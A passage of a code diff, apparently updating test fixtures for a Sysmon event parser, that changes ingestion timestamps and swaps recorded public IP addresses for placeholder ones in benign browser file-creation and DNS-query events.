Data\\fe823684-c940-49f2-a940-14b02cbafba9.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11122,7 +11004,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313883291Z", + "ingested": "2021-12-09T13:49:44.739636900Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e27\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\162d4140-cfab-4d05-9c92-bca60515a622.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11183,7 +11065,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313884544Z", + "ingested": "2021-12-09T13:49:44.739641500Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e28\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\1450fedf-ac4c-4e35-b371-ed5d3bbe4776.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.028\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11244,7 +11126,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313885841Z", + "ingested": "2021-12-09T13:49:44.739646400Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e29\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\37ed32e9-3c5f-4663-8457-c70743e9456d.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:51:54.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11302,7 +11184,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313887291Z", + "ingested": "2021-12-09T13:49:44.739651900Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e30\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccab-5c8f-0000-001064eb2700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2680\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11363,7 +11245,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313888640Z", + "ingested": "2021-12-09T13:49:44.739655600Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e31\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\nmmhkkegccagdldgiimedpiccmgmieda\\def\\ecb9c915-c4c2-4600-a920-f2bc302990a8.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:08.496\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11431,12 +11313,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { @@ -11453,13 +11335,13 @@ "dsum.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313889844Z", + "ingested": "2021-12-09T13:49:44.739660300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11523,23 +11405,23 @@ "type": "CNAME" }, { - "data": "216.200.232.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "74.121.138.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11547,7 +11429,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11555,7 +11437,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11563,22 +11445,22 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -11594,23 +11476,20 @@ "sync.mathtag.com" ], "ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313891174Z", + "ingested": "2021-12-09T13:49:44.739666Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11678,12 +11557,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -11700,13 +11579,13 @@ "status.rapidssl.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313892567Z", + "ingested": "2021-12-09T13:49:44.739669700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11770,39 +11649,39 @@ "type": "CNAME" }, { - "data": "34.197.195.131", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.192.39.82", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.231.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.113.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.197.3.157", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.205.112.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.195.29.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.201.247.123", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11810,22 +11689,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -11841,23 +11720,16 @@ "sync.extend.tv" ], "ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313893886Z", + "ingested": "2021-12-09T13:49:44.739673500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 